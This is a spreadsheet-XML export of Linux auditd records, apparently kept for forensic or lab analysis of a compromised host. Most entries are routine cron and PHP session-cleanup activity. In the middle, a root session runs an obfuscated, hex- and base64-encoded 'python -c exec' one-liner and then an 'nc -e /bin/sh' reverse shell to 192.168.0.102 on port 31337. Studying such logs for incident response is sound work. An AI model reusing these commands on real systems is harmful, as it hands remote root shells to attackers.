    <t>msg=audit(1584778067.053:1129):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558a83fa2828 a1=558a8315cc00 a2=558a83fa2798 a3=558a83fa2010 items=2 ppid=3734 pid=3735 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="basename" exe="/usr/bin/basename" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.057:1130):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558a83fada78 a1=558a83fad9b0 a2=558a83fad9e8 a3=558a83fa2010 items=2 ppid=3736 pid=3737 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="dirname" exe="/usr/bin/dirname" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.061:1131):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55955843ffb0 a1=559558440180 a2=55955843fbf0 a3=559558433010 items=2 ppid=3738 pid=3739 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="dircolors" exe="/usr/bin/dircolors" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.061:1132):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=55955843cb50 a1=0 a2=0 a3=559558433010 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778072.153:1133):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55955846ee30 a1=559558442430 a2=559558446c80 a3=8 items=3 ppid=3750 pid=3751 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="command-not-fou" exe="/usr/bin/python3.6" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="/usr/bin/python3" a1="/usr/lib/command-not-found" a2="--" a3=".log"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F707974686F6E33002F7573722F6C69622F636F6D6D616E642D6E6F742D666F756E64002D2D002E6C6F67</t>
  </si>
  <si>
    <t>msg=audit(1584778072.833:1134):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7f210bf11210 a1=7f2109cdde10 a2=7ffc5b043390 a3=9 items=2 ppid=3751 pid=3754 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="snap" exe="/usr/bin/snap" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=5 a0="/usr/bin/snap" a1="advise-snap" a2="--format=json" a3="--command" a4=".log"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F736E6170006164766973652D736E6170002D2D666F726D61743D6A736F6E002D2D636F6D6D616E64002E6C6F67</t>
  </si>
  <si>
    <t>msg=audit(1584778083.610:1135):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=559558441b10 a1=559558441260 a2=55955846de60 a3=8 items=2 ppid=3730 pid=3781 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="python" exe="/usr/bin/python2.7" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="python" a1="-c" a2=6578656328205F5F696D706F72745F5F2820276261736536342720292E6465636F6465737472696E67285F5F696D706F72745F5F2820276261736536342720292E6465636F6465737472696E6728202759336F785A6C67796248526A527A6C355A4559355A6B74445A4870694D6B3579576C6852626B74544E5870694D6B3579576C6852623167784F58426957454A32593235535A6C68355A32356A5C6E4D6A6C7159544A574D457035613356525656706D55315531526770575133686D57444A7364474E484F586C6B526A6C6D53304E6B656D4979546E4A615746467553314D3156465177546B78595C6E4D55355656577457516C5254617A644A534531315754493564574A74566D706B51326476536E70464E5531704E48684F616D6431436B31444E48684E52456C7554454E426545313654544E4C5C6E55327333535559355A6D46584D5864694D306F775744453462306F794F58704B65577431576B6857643031706148704D62567077596B645764574A355A33424D5245467754336C435A6C67795C6E6248514B59306335655752474F575A4C5132523259336C6A63457874556A466A52456C7659336B3162574658654778696254687653314E3365457455633264594D546C77596C6843646D4E755C6E556D5A5965576475596A4E4E626B74544E57746B574546355330684E645170616257787A576C6331646B744461334E4E61577333535568424F5667784F58426957454A32593235535A6C68355C6E5A32356A4D315A705930684B646C6B79566E706A65574E775447314F61474A486432395865574E32575731736455777A546D394B65586475436B7858613235595532733943673D3D5C6E2720292929</t>
  </si>
  <si>
    <t>proctitle=707974686F6E002D63006578656328205F5F696D706F72745F5F2820276261736536342720292E6465636F6465737472696E67285F5F696D706F72745F5F2820276261736536342720292E6465636F6465737472696E6728202759336F785A6C67796248526A527A6C355A4559355A6B74445A4870694D6B3579576C6852626B</t>
  </si>
  <si>
    <t>msg=audit(1584778097.822:1136):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55955846ff70 a1=559558470010 a2=55955846de60 a3=559558433010 items=2 ppid=3730 pid=3810 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="python" exe="/usr/bin/python2.7" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778126.322:1137):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5595584700a0 a1=559558446520 a2=55955846de60 a3=8 items=2 ppid=3730 pid=3869 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="nc" exe="/bin/nc.openbsd" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="192.168.0.102" a4="31337"</t>
  </si>
  <si>
    <t>proctitle=6E63002D65002F62696E2F7368003139322E3136382E302E313032003331333337</t>
  </si>
  <si>
    <t>msg=audit(1584778137.486:1138):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55955846e790 a1=55955846fde0 a2=55955846de60 a3=8 items=2 ppid=3730 pid=3895 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="nc" exe="/bin/nc.openbsd" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="nc" a1="192.168.0.102" a2="31337"</t>
  </si>
  <si>
    <t>proctitle=6E63003139322E3136382E302E313032003331333337</t>
  </si>
  <si>
    <t>msg=audit(1584778137.486:1139):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=559558470be0 a1=55955846ff50 a2=55955846de60 a3=8 items=2 ppid=3730 pid=3894 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="sh" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=1 a0="/bin/sh"</t>
  </si>
  <si>
    <t>proctitle="/bin/sh"</t>
  </si>
  <si>
    <t>msg=audit(1584778140.494:1140):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=56151ad221f0 a1=56151ae28c90 a2=56151adfc2e0 a3=56151ad220c0 items=3 ppid=1 pid=3902 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sessionclean" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-e" a2="/usr/lib/php/sessionclean"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002D65002F7573722F6C69622F7068702F73657373696F6E636C65616E</t>
  </si>
  <si>
    <t>msg=audit(1584778140.498:1141):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6abf40 a1=55742b6abee0 a2=55742b6abf10 a3=7f946d5a7810 items=2 ppid=3902 pid=3905 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=5 a0="sort" a1="-u" a2="-t:" a3="-k" a4="1,1"</t>
  </si>
  <si>
    <t>proctitle=736F7274002D75002D743A002D6B00312C31</t>
  </si>
  <si>
    <t>msg=audit(1584778140.498:1142):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6abf20 a1=55742b6abec8 a2=55742b6abef0 a3=7f946d5a7810 items=2 ppid=3902 pid=3904 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="sort" a1="-rn" a2="-t:" a3="-k2,2"</t>
  </si>
  <si>
    <t>proctitle=736F7274002D726E002D743A002D6B322C32</t>
  </si>
  <si>
    <t>msg=audit(1584778140.498:1143):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6abe60 a1=55742b6abea8 a2=55742b6abec0 a3=7f946d5a7810 items=3 ppid=3903 pid=3907 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="phpquery" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="/usr/sbin/phpquery" a2="-V"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F7362696E2F7068707175657279002D56</t>
  </si>
  <si>
    <t>msg=audit(1584778140.530:1144):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558dd7dae2c8 a1=558dd67b6c70 a2=558dd7dae298 a3=558dd65ae962 items=2 ppid=3907 pid=3908 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="expr" exe="/usr/bin/expr" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="expr" a1="2" a2="-" a3="1"</t>
  </si>
  <si>
    <t>proctitle=657870720032002D0031</t>
  </si>
  <si>
    <t>msg=audit(1584778140.530:1145):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558dd7dae3b0 a1=558dd7dae368 a2=558dd7dae380 a3=558dd7dad010 items=2 ppid=3907 pid=3911 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="sort" a1="-rn"</t>
  </si>
  <si>
    <t>proctitle=736F7274002D726E</t>
  </si>
  <si>
    <t>msg=audit(1584778140.534:1146):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558dd7dae5e8 a1=558dd7dae560 a2=558dd7dae5b8 a3=7f48b3df7810 items=2 ppid=3912 pid=3913 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F7573722F6C69622F706870002D6D696E64657074680031002D6D617864657074680031002D7265676578002E2A5B302D395D5C2E5B302D395D002D7072696E74660025665C6E</t>
  </si>
  <si>
    <t>msg=audit(1584778140.538:1147):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac590 a1=55742b6ac380 a2=55742b6ac558 a3=55742b6ac4e0 items=2 ppid=3903 pid=3914 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="php7.2" exe="/usr/bin/php7.2" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=7 a0="php7.2" a1="-c" a2="/etc/php/7.2/apache2/php.ini" a3="-d" a4="error_reporting='~E_ALL'" a5="-r" a6=666F726561636828696E695F6765745F616C6C282273657373696F6E222920617320246B203D3E20247629206563686F2022246B3D222E24765B226C6F63616C5F76616C7565225D2E225C6E223B</t>
  </si>
  <si>
    <t>proctitle=706870372E32002D63002F6574632F7068702F372E322F617061636865322F7068702E696E69002D64006572726F725F7265706F7274696E673D277E455F414C4C27002D7200666F726561636828696E695F6765745F616C6C282273657373696F6E222920617320246B203D3E20247629206563686F2022246B3D222E24765B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.710:1148):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac2f8 a1=55742b6ac2a8 a2=55742b6ac2c8 a3=0 items=2 ppid=3915 pid=3917 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="sed" a1="-ne" a2="s/^session\.save_handler=\(.*\)$/\1/p"</t>
  </si>
  <si>
    <t>proctitle=736564002D6E6500732F5E73657373696F6E5C2E736176655F68616E646C65723D5C282E2A5C29242F5C312F70</t>
  </si>
  <si>
    <t>msg=audit(1584778140.710:1149):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac308 a1=55742b6ac2b8 a2=55742b6ac2d8 a3=0 items=2 ppid=3918 pid=3920 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="sed" a1="-ne" a2="s/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p"</t>
  </si>
  <si>
    <t>proctitle=736564002D6E6500732F5E73657373696F6E5C2E736176655F706174683D5C282E2A3B5C295C3F5C282E2A5C29242F5C322F70</t>
  </si>
  <si>
    <t>msg=audit(1584778140.714:1150):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac2f8 a1=55742b6ac2a8 a2=55742b6ac2c8 a3=0 items=2 ppid=3921 pid=3923 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="sed" a1="-ne" a2="s/^session\.gc_maxlifetime=\(.*\)$/\1/p"</t>
  </si>
  <si>
    <t>proctitle=736564002D6E6500732F5E73657373696F6E5C2E67635F6D61786C69666574696D653D5C282E2A5C29242F5C312F70</t>
  </si>
  <si>
    <t>msg=audit(1584778140.718:1151):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac2a0 a1=55742b6ac250 a2=55742b6ac270 a3=55742989b962 items=2 ppid=3924 pid=3926 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="sed" a1="-e" a2="s,@VERSION@,7.2,"</t>
  </si>
  <si>
    <t>proctitle=736564002D6500732C4056455253494F4E402C372E322C</t>
  </si>
  <si>
    <t>msg=audit(1584778140.718:1152):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6acd30 a1=55742b6ac380 a2=55742b6accf8 a3=55742b6aef70 items=2 ppid=3903 pid=3927 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="php7.2" exe="/usr/bin/php7.2" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=7 a0="php7.2" a1="-c" a2="/etc/php/7.2/cli/php.ini" a3="-d" a4="error_reporting='~E_ALL'" a5="-r" a6=666F726561636828696E695F6765745F616C6C282273657373696F6E222920617320246B203D3E20247629206563686F2022246B3D222E24765B226C6F63616C5F76616C7565225D2E225C6E223B</t>
  </si>
  <si>
    <t>proctitle=706870372E32002D63002F6574632F7068702F372E322F636C692F7068702E696E69002D64006572726F725F7265706F7274696E673D277E455F414C4C27002D7200666F726561636828696E695F6765745F616C6C282273657373696F6E222920617320246B203D3E20247629206563686F2022246B3D222E24765B226C6F63</t>
  </si>
  <si>
    <t>msg=audit(1584778140.750:1153):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac2f8 a1=55742b6ac2a8 a2=55742b6ac2c8 a3=0 items=2 ppid=3928 pid=3930 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778140.750:1154):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac308 a1=55742b6ac2b8 a2=55742b6ac2d8 a3=0 items=2 ppid=3931 pid=3933 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778140.754:1155):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac2f8 a1=55742b6ac2a8 a2=55742b6ac2c8 a3=0 items=2 ppid=3934 pid=3936 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778140.754:1156):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac2c0 a1=55742b6ac270 a2=55742b6ac290 a3=55742989b962 items=2 ppid=3937 pid=3939 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778140.758:1157):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6abf00 a1=55742b6abeb0 a2=55742b6abed0 a3=55742989b962 items=2 ppid=3903 pid=3940 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="pidof" exe="/sbin/killall5" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="pidof" a1="apache2" a2="php7.2"</t>
  </si>
  <si>
    <t>proctitle=7069646F66006170616368653200706870372E32</t>
  </si>
  <si>
    <t>msg=audit(1584778140.794:1158):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac398 a1=55742b6ac2f0 a2=55742b6ac368 a3=7f946d5a7810 items=2 ppid=3903 pid=3941 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/proc/1157/fd" a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch" a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F70726F632F313135372F6664002D69676E6F72655F726561646469725F72616365002D6C6E616D65002F7661722F6C69622F7068702F73657373696F6E732F736573735F2A002D6578656300746F756368002D63007B7D003B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.798:1159):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac398 a1=55742b6ac2f0 a2=55742b6ac368 a3=7f946d5a7810 items=2 ppid=3903 pid=3942 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/proc/1156/fd" a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch" a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F70726F632F313135362F6664002D69676E6F72655F726561646469725F72616365002D6C6E616D65002F7661722F6C69622F7068702F73657373696F6E732F736573735F2A002D6578656300746F756368002D63007B7D003B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.798:1160):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac398 a1=55742b6ac2f0 a2=55742b6ac368 a3=7f946d5a7810 items=2 ppid=3903 pid=3943 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/proc/1155/fd" a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch" a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F70726F632F313135352F6664002D69676E6F72655F726561646469725F72616365002D6C6E616D65002F7661722F6C69622F7068702F73657373696F6E732F736573735F2A002D6578656300746F756368002D63007B7D003B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.802:1161):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac398 a1=55742b6ac2f0 a2=55742b6ac368 a3=7f946d5a7810 items=2 ppid=3903 pid=3944 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/proc/1154/fd" a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch" a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F70726F632F313135342F6664002D69676E6F72655F726561646469725F72616365002D6C6E616D65002F7661722F6C69622F7068702F73657373696F6E732F736573735F2A002D6578656300746F756368002D63007B7D003B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.802:1162):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac398 a1=55742b6ac2f0 a2=55742b6ac368 a3=7f946d5a7810 items=2 ppid=3903 pid=3945 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/proc/1153/fd" a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch" a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F70726F632F313135332F6664002D69676E6F72655F726561646469725F72616365002D6C6E616D65002F7661722F6C69622F7068702F73657373696F6E732F736573735F2A002D6578656300746F756368002D63007B7D003B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.806:1163):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac398 a1=55742b6ac2f0 a2=55742b6ac368 a3=7f946d5a7810 items=2 ppid=3903 pid=3946 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/proc/1098/fd" a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch" a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F70726F632F313039382F6664002D69676E6F72655F726561646469725F72616365002D6C6E616D65002F7661722F6C69622F7068702F73657373696F6E732F736573735F2A002D6578656300746F756368002D63007B7D003B</t>
  </si>
  <si>
    <t>msg=audit(1584778140.806:1164):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55742b6ac248 a1=55742b6ac1a0 a2=55742b6ac218 a3=7f946d5a7810 items=2 ppid=3906 pid=3947 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=14 a0="find" a1="-O3" a2="/var/lib/php/sessions/" a3="-ignore_readdir_race" a4="-depth" a5="-mindepth" a6="1" a7="-name" a8="sess_*" a9="-type" a10="f" a11="-cmin" a12="+24" a13="-delete"</t>
  </si>
  <si>
    <t>proctitle=66696E64002D4F33002F7661722F6C69622F7068702F73657373696F6E732F002D69676E6F72655F726561646469725F72616365002D6465707468002D6D696E64657074680031002D6E616D6500736573735F2A002D747970650066002D636D696E002B3234002D64656C657465</t>
  </si>
  <si>
    <t>msg=audit(1584778140.810:1165):</t>
  </si>
  <si>
    <t>pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=phpsessionclean comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778140.810:1166):</t>
  </si>
  <si>
    <t>msg=audit(1584778141.774:1167):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=6 a0=ffffff9c a1=7f4f041de2a3 a2=80000 a3=0 items=1 ppid=825 pid=3952 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="cron" exe="/usr/sbin/cron" key="etcpasswd"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F7362696E2F43524F4E002D66</t>
  </si>
  <si>
    <t>msg=audit(1584778141.774:1168):</t>
  </si>
  <si>
    <t>pid=3952 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778141.774:1169):</t>
  </si>
  <si>
    <t>pid=3952 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778141.774:1170):</t>
  </si>
  <si>
    <t>pid=3952 uid=0 old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=7 res=1</t>
  </si>
  <si>
    <t>msg=audit(1584778141.778:1171):</t>
  </si>
  <si>
    <t>pid=3952 uid=0 auid=0 ses=7 msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778141.778:1172):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=561a7332fcd6 a1=7ffe35ab4390 a2=561a7332fd80 a3=7ffe35ab4430 items=2 ppid=3952 pid=3953 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=7 comm="sh" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-c" a2=20205B202D78202F7573722F6C69622F7068702F73657373696F6E636C65616E205D202626206966205B2021202D64202F72756E2F73797374656D642F73797374656D205D3B207468656E202F7573722F6C69622F7068702F73657373696F6E636C65616E3B206669</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002D630020205B202D78202F7573722F6C69622F7068702F73657373696F6E636C65616E205D202626206966205B2021202D64202F72756E2F73797374656D642F73797374656D205D3B207468656E202F7573722F6C69622F7068702F73657373696F6E636C65616E3B206669</t>
  </si>
  <si>
    <t>msg=audit(1584778141.778:1173):</t>
  </si>
  <si>
    <t>pid=3952 uid=0 auid=0 ses=7 msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778141.782:1174):</t>
  </si>
  <si>
    <t>pid=3952 uid=0 auid=0 ses=7 msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778196.099:1175):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=4 success=yes exit=0 a0=55955846ff70 a1=7ffe990b2270 a2=7ffe990b2270 a3=55955846ff71 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="power_abuse"</t>
  </si>
